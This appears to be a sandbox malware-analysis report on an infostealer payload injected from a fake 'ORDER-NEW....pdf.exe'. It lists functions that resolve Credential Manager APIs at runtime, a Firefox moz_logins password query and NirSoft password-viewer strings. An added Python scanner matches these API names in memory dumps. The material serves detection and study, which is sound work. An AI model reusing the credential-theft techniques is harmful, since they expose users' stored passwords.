• Opcode ID: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
• Instruction ID: 777907c91c3138f07d32b7effc6a6e277a0cb3bdfe1d402d2202e46302417196
• Opcode Fuzzy Hash: cfd5c71916fbce4a342b80b0f76a79ff8ef3fa3daac0bce444ef2cea232ec273
• Instruction Fuzzy Hash: B5014030940715AAD7318F256E44B6A2EE4E759B83B14002BA404D2A5AEBB8D941DBAC
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: _wcsicmp
• String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
• API String ID: 2081463915-1959339147
• Opcode ID: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
• Instruction ID: 6ae1867121f1a9de607d4cf96a2848453b881622ab493d5bc2878352e6736150
• Opcode Fuzzy Hash: d68f99de9f7ef6dc0a98dc4c4bcb6a836855c619b54ed7beb0ba6369b4841934
• Instruction Fuzzy Hash: 4D01EC6328A32164F97469A7AC07F8B0A49CBD2F7AF71543BF904D41C6FF8D944560AC
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00411589), ref: 00412F24
• GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00412F3D
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00412F4E
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00412F5F
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 00412F70
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00412F81
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
• API String ID: 667068680-3953557276
• Opcode ID: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
• Instruction ID: 90193f1111e05c4afbc6439255eabbfb584b4719c6c3eda45dffcf0f008ca331
• Opcode Fuzzy Hash: 9afc599291b44c0031a1a238e792fad3046f96ec859f9be66ee04854d14c5414
• Instruction Fuzzy Hash: 6BF08B30941321AEAB208F295F40F6729B4E745BCAF140037B404D1655DBE8C453DF7D
Uniqueness
Uniqueness Score: -1.00%

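Taken together, the entries above show the injected payload resolving its sensitive imports at runtime rather than through the import table: LoadLibraryW/GetModuleHandleW followed by GetProcAddress for the advapi32 Crypt* family, the psapi process-enumeration set and the kernel32 Toolhelp32 set (the CredEnumerate/CredRead entry further down does the same for the Credential Manager API), plus a function that compares NirSoft-style export switches (/scomma, /shtml, /stab, /sxml, ...) with _wcsicmp. Because these names never appear as imports of the on-disk loader, a static import scan of ORDER-NEW....pdf.exe misses them; they only exist as strings in the unpacked image dumped from process 8 at 0x400000. The following triage scanner is an added example, not part of the Joe Sandbox report or of any Joe Sandbox tooling: it searches a dump for NUL-terminated occurrences of exactly these strings (ANSI for the GetProcAddress names, ANSI or UTF-16LE for the switches, since they are compared with a wide-string function) and reports which capability clusters are present. The cluster names, the hit threshold and the sample dump bytes are constructed for the example.

```python
"""Triage scanner for dynamically resolved API names and NirSoft-style
switches in a memory dump or unpacked PE image (added example)."""
import sys
from typing import Dict, List, Tuple

# Capability clusters assembled from the API names and switches the report
# shows being resolved with GetProcAddress or compared with _wcsicmp.
# The cluster labels are this example's own naming.
CAPABILITY_STRINGS: Dict[str, List[str]] = {
    "cryptoapi_hashing (advapi32)": [
        "CryptAcquireContextA", "CryptCreateHash", "CryptHashData",
        "CryptGetHashParam", "CryptDestroyHash", "CryptReleaseContext",
    ],
    "credential_manager_access (advapi32)": [
        "CredEnumerateA", "CredEnumerateW", "CredReadA", "CredDeleteA", "CredFree",
    ],
    "process_enumeration (psapi)": [
        "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW",
        "GetModuleFileNameExW", "GetModuleInformation",
    ],
    "process_enumeration (toolhelp32)": [
        "CreateToolhelp32Snapshot", "Process32First", "Process32Next",
        "Module32First", "Module32Next",
    ],
    "nirsoft_style_export_switches": [
        "/scomma", "/shtml", "/stab", "/stabular", "/sverhtml", "/sxml", "/skeepass",
    ],
}


def _encodings(s: str) -> Tuple[bytes, bytes]:
    # Strings in a binary are NUL terminated; matching the terminator keeps
    # "/stab" from matching inside "/stabular" and "Process32First" from
    # matching "Process32FirstW". GetProcAddress names are ANSI; the switches
    # are compared with _wcsicmp, so they may be stored as UTF-16LE.
    return (s.encode("ascii") + b"\x00", s.encode("utf-16-le") + b"\x00\x00")


def find_strings(data: bytes, needles: List[str]) -> List[str]:
    """Return the needles present in data in either encoding, in list order."""
    found = []
    for s in needles:
        if any(enc in data for enc in _encodings(s)):
            found.append(s)
    return found


def find_capabilities(data: bytes, min_hits: int = 3) -> Dict[str, List[str]]:
    """Map each capability cluster with at least min_hits matches to its hits.
    A threshold avoids flagging a single benign name (e.g. EnumProcesses)."""
    report: Dict[str, List[str]] = {}
    for capability, names in CAPABILITY_STRINGS.items():
        hits = find_strings(data, names)
        if len(hits) >= min_hits:
            report[capability] = hits
    return report


def scan_file(path: str, min_hits: int = 3) -> Dict[str, List[str]]:
    with open(path, "rb") as fh:
        return find_capabilities(fh.read(), min_hits)


# Constructed stand-in for a memory dump (not data from the report): a few
# NUL-terminated ANSI API names and UTF-16LE switches between filler bytes.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"advapi32.dll\x00CredEnumerateW\x00CredReadA\x00CredFree\x00"
    + b"\x90" * 32
    + b"CryptAcquireContextA\x00CryptCreateHash\x00CryptHashData\x00CryptGetHashParam\x00"
    + b"\xcc" * 8
    + "/scomma".encode("utf-16-le") + b"\x00\x00"
    + "/sxml".encode("utf-16-le") + b"\x00\x00"
    + "/skeepass".encode("utf-16-le") + b"\x00\x00"
    + b"EnumProcesses\x00"  # one psapi name only: below the threshold
)

if __name__ == "__main__":
    # Usage: python scanner.py <dump-or-unpacked-pe>; with no argument the
    # constructed sample is scanned instead.
    result = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_capabilities(SAMPLE_DUMP)
    for capability, hits in result.items():
        print(f"{capability}: {', '.join(hits)}")
```

Run it against the 0x400000 dump of the hollowed process rather than the original .NET dropper; on the loader itself the clusters will be absent, which is exactly the evasion the runtime resolution buys. Matching clusters is a triage signal, not a verdict: legitimate password-recovery utilities carry the same names, so confirm with the injection and credential-access behaviour the report records.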
APIs
  • Part of subcall function 00403BA4: FreeLibrary.KERNEL32(?,00403B31,00000000,00409589,?,00000000,?), ref: 00403BAB
• LoadLibraryW.KERNEL32(advapi32.dll,00000000,00409589,?,00000000,?), ref: 00403B36
• GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00403B4F
• GetProcAddress.KERNEL32(?,CredFree), ref: 00403B5B
• GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403B67
• GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00403B73
• GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403B7F
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$Library$FreeLoad
• String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
• API String ID: 2449869053-4258758744
• Opcode ID: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
• Instruction ID: 8f7743962e36341c748a679f4d1b70e48ab6ec882cd35c5a4d1c5c737e04e9f5
                                                                                                                                                                        • Opcode Fuzzy Hash: b35c21cb85061f263d9bcfade7dbfc97ff2743854c4f3c632f847b452f6a88c2
                                                                                                                                                                        • Instruction Fuzzy Hash: 4F011A34500B419BDB31AF768809E0ABBF4EF94709B20882FE091A3692D6BDB140CF48
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

APIs
• SetBkMode.GDI32(?,00000001), ref: 0040FA22
• SetTextColor.GDI32(?,00FF0000), ref: 0040FA30
• SelectObject.GDI32(?,?), ref: 0040FA45
• DrawTextExW.USER32(?,?,000000FF,?,00000004,?), ref: 0040FA79
• SelectObject.GDI32(00000014,00000005), ref: 0040FA85
  • Part of subcall function 0040F7F1: GetCursorPos.USER32(?), ref: 0040F7FB
  • Part of subcall function 0040F7F1: GetSubMenu.USER32 ref: 0040F809
  • Part of subcall function 0040F7F1: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040F83A
• GetModuleHandleW.KERNEL32(00000000), ref: 0040FAA0
• LoadCursorW.USER32(00000000,00000067), ref: 0040FAA9
• SetCursor.USER32(00000000), ref: 0040FAB0
• PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040FAF4
• memcpy.MSVCRT ref: 0040FB3D
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Cursor$MenuObjectSelectText$ColorDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
• String ID: WebBrowserPassView
• API String ID: 3991541706-2171583229
• Opcode ID: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
• Instruction ID: d9273dffa9cc4a7b5f3d28471e210e7f23542924c6da0ead56af32090a150d55
• Opcode Fuzzy Hash: af87e28441c52666e05ef975f9e80766b0ecba8b6e67ff3cf46880ee9de98c1b
• Instruction Fuzzy Hash: 3C51F431600105ABDB34AF64C895B6A77B6BF48310F104137F909AB6E1DB78EC55CF89
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClientRect.USER32 ref: 0040EA07
• GetWindowRect.USER32 ref: 0040EA1D
• GetWindowRect.USER32 ref: 0040EA33
• GetDlgItem.USER32 ref: 0040EA6D
• GetWindowRect.USER32 ref: 0040EA74
• MapWindowPoints.USER32 ref: 0040EA84
• BeginDeferWindowPos.USER32 ref: 0040EAA8
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040EACB
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040EAEA
• DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040EB15
• DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040EB2D
• EndDeferWindowPos.USER32(?), ref: 0040EB32
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Window$Defer$Rect$BeginClientItemPoints
• String ID:
• API String ID: 552707033-0
• Opcode ID: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
• Instruction ID: dc3f1f52df5294a2ec978d0ae6c3ccd5c38b38754740f987f7490d1c54cf7de8
• Opcode Fuzzy Hash: d377f14bac66848249b0c215b625da6d3176a3386a63c890cfc2e0202b3da6cd
• Instruction Fuzzy Hash: 9141B275A00609BFEF11DFA8CD89FEEBBBAFB48304F100465E615A61A0C7716A50DB14
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040A401,?,?,*.*,0040A46B,00000000), ref: 0040A250
  • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
• GetFileSize.KERNEL32(00000000,00000000), ref: 0040A280
  • Part of subcall function 0040A19F: _memicmp.MSVCRT ref: 0040A1B9
  • Part of subcall function 0040A19F: memcpy.MSVCRT ref: 0040A1D0
• memcpy.MSVCRT ref: 0040A2C7
• strchr.MSVCRT ref: 0040A2EC
• strchr.MSVCRT ref: 0040A2FD
• _strlwr.MSVCRT ref: 0040A30B
• memset.MSVCRT ref: 0040A326
• CloseHandle.KERNEL32(00000000), ref: 0040A373
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
• String ID: 4$h
• API String ID: 4066021378-1856150674
• Opcode ID: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
• Instruction ID: 17f5db22f20d9ae327a0934dc0a50b98bc11baf633b6527cb3b89d44c7cb3914
• Opcode Fuzzy Hash: 037d5fbce9d0b4662d9ebf7469ceba7c591ab6ee4687e3a1553bf719baa28f42
• Instruction Fuzzy Hash: 3D31A271900218BFEB11EBA4CC85FEE77ACEB45354F10406AFA08E6181E7399F558B69
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$_snwprintf
• String ID: %%0.%df
• API String ID: 3473751417-763548558
• Opcode ID: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
• Instruction ID: 0b838db9f825932711660ea6569b586705b9a26b63b1a47a63d1f68ae8ff407c
• Opcode Fuzzy Hash: 006428a89fa05684acf2644298e63651eb7cb4553425473b44fafabdd736af6e
• Instruction Fuzzy Hash: 86313271900129BBEB20DF55CC85FEB7B7CEF89304F0100EAF509A2112EB789A54CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,00000041,00000064,00000000), ref: 004055F3
• KillTimer.USER32(?,00000041), ref: 00405603
• KillTimer.USER32(?,00000041), ref: 00405614
• GetTickCount.KERNEL32 ref: 00405637
• GetParent.USER32(?), ref: 00405662
• SendMessageW.USER32(00000000), ref: 00405669
• BeginDeferWindowPos.USER32 ref: 00405677
• EndDeferWindowPos.USER32(00000000), ref: 004056C7
• InvalidateRect.USER32(?,?,00000001), ref: 004056D3
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
• String ID: A
• API String ID: 2892645895-3554254475
• Opcode ID: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
• Instruction ID: 7dfccb24d1e076f690be31caf06a6d4f547633615caf0f8568b2f3749d1e3a55
• Opcode Fuzzy Hash: a5eb5b96462c3251e9a860f7e43a9a09c1a522a6715d8b372432c44450ed2e81
• Instruction Fuzzy Hash: 1D317E75640B04BBEB201F659C85F6B7B6AFB44741F50883AF30A7A1E1C7F698908E58
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 0040E378
• <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 0040E2AC
• <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 0040E319
• <table dir="rtl"><tr><td>, xrefs: 0040E33C
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$_snwprintf$wcscpy
• String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                        • API String ID: 1283228442-2366825230
Uniqueness

Uniqueness Score: -1.00%

APIs
• wcschr.MSVCRT ref: 0041304A
• wcscpy.MSVCRT ref: 0041305A
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EBE
  • Part of subcall function 00407EAF: wcslen.MSVCRT ref: 00407EC8
  • Part of subcall function 00407EAF: _memicmp.MSVCRT ref: 00407EE3
• wcscpy.MSVCRT ref: 004130A9
• wcscat.MSVCRT ref: 004130B4
• memset.MSVCRT ref: 00413090
  • Part of subcall function 00408463: GetWindowsDirectoryW.KERNEL32(00453718,00000104,?,004130E9,?,?,00000000,00000208,-00000028), ref: 00408479
  • Part of subcall function 00408463: wcscpy.MSVCRT ref: 00408489
• memset.MSVCRT ref: 004130D8
• memcpy.MSVCRT ref: 004130F3
• wcscat.MSVCRT ref: 004130FF
Strings
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00443A61: memset.MSVCRT ref: 00443A8C
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AA3
  • Part of subcall function 00443A61: memset.MSVCRT ref: 00443AD6
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443AEC
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443AFD
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B23
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B34
  • Part of subcall function 00443A61: wcscpy.MSVCRT ref: 00443B5B
  • Part of subcall function 00443A61: wcscat.MSVCRT ref: 00443B6C
  • Part of subcall function 00443A61: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
  • Part of subcall function 00443A61: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
  • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
  • Part of subcall function 00443A61: GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
• memset.MSVCRT ref: 0040748C
  • Part of subcall function 00408C5E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,00402A35,?,?), ref: 00408C77
• memset.MSVCRT ref: 0040750B
• memset.MSVCRT ref: 00407520
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040765C
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407672
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407688
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040769E
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076B4
• strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004076CA
• memset.MSVCRT ref: 004076E0
Strings
• SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins, xrefs: 004074D2
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memsetstrcpy$wcscpy$wcscat$AddressProc$ByteCharHandleLibraryLoadModuleMultiWide
• String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword, timeCreated, timeLastUsed, timePasswordChanged, timesUsed FROM moz_logins
• API String ID: 2096775815-1337997248
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
• GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
• malloc.MSVCRT ref: 00417FD2
• free.MSVCRT(?), ref: 00417FE2
• GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00417FF6
• free.MSVCRT(?), ref: 00417FFB
• GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00418011
• malloc.MSVCRT ref: 00418019
• GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 0041802C
• free.MSVCRT(?), ref: 00418031
• free.MSVCRT(?), ref: 00418045
• free.MSVCRT(00000000,0044C838,00000000), ref: 00418064
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$FullNamePath$malloc$Version
• String ID:
• API String ID: 3356672799-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• EmptyClipboard.USER32 ref: 00407FA4
  • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
• GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
• GlobalLock.KERNEL32 ref: 00407FDF
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
• GlobalUnlock.KERNEL32(00000000), ref: 00408004
• SetClipboardData.USER32(0000000D,00000000), ref: 0040800D
• GetLastError.KERNEL32 ref: 00408015
• CloseHandle.KERNEL32(?), ref: 00408021
• GetLastError.KERNEL32 ref: 0040802C
• CloseClipboard.USER32 ref: 00408035
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: wcscpy
• String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
• API String ID: 1284135714-318151290
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
• String ID: 0$6
• API String ID: 4066108131-3849865405
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
• #17.COMCTL32(?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CDF
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(nss3.dll,00000000,?,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041172A
• GetModuleHandleW.KERNEL32(sqlite3.dll,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411733
• GetModuleHandleW.KERNEL32(mozsqlite3.dll,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041173C
• FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 0041174B
• FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411752
• FreeLibrary.KERNEL32(00000000,?,73B757F0,00411871,?,?,?,?,?,00000000), ref: 00411759
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: FreeHandleLibraryModule
• String ID: mozsqlite3.dll$nss3.dll$sqlite3.dll
• API String ID: 662261464-3550686275
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: memcpy$memchrmemset
• String ID: UCD$UCD
• API String ID: 1581201632-670880344
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32 ref: 004085E9
• GetSystemMetrics.USER32 ref: 004085EF
• GetDC.USER32(00000000), ref: 004085FC
• GetDeviceCaps.GDI32(00000000,00000008), ref: 0040860D
• GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408614
• ReleaseDC.USER32 ref: 0040861B
• GetWindowRect.USER32 ref: 0040862E
• GetParent.USER32(?), ref: 00408633
• GetWindowRect.USER32 ref: 00408650
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004086AF
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
• String ID:
• API String ID: 2163313125-0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
Similarity
• API ID: free$wcslen
• String ID:
• API String ID: 3592753638-3916222277
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadMenuW.USER32 ref: 0040BB4B
  • Part of subcall function 0040B974: GetMenuItemCount.USER32 ref: 0040B98A
  • Part of subcall function 0040B974: memset.MSVCRT ref: 0040B9A9
  • Part of subcall function 0040B974: GetMenuItemInfoW.USER32 ref: 0040B9E5
  • Part of subcall function 0040B974: wcschr.MSVCRT ref: 0040B9FD
• DestroyMenu.USER32(00000000), ref: 0040BB69
• CreateDialogParamW.USER32 ref: 0040BBB7
• memset.MSVCRT ref: 0040BBD3
• GetWindowTextW.USER32 ref: 0040BBE8
• EnumChildWindows.USER32 ref: 0040BC13
• DestroyWindow.USER32(00000000), ref: 0040BC1A
  • Part of subcall function 0040B7A3: _snwprintf.MSVCRT ref: 0040B7C8
Memory Dump Source
• Source File: 00000008.00000002.715632355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$DestroyItemWindowmemset$ChildCountCreateDialogEnumInfoLoadParamTextWindows_snwprintfwcschr
                                                                                                                                                                        • String ID: caption
                                                                                                                                                                        • API String ID: 1928666178-4135340389
                                                                                                                                                                        • Opcode ID: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                        • Instruction ID: e22aff4ff37d874dc9406bb5861836d8cb00257f57c634ff68b223b0e4ee6d7d
                                                                                                                                                                        • Opcode Fuzzy Hash: e424083c0ca5028a7f352563cdf0725328d58b63161901b2b272de0412def72f
                                                                                                                                                                        • Instruction Fuzzy Hash: 6821A172500218ABEF21AF50EC49EAF3B78FF46754F00447AF905A5192DB789990CBDE
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

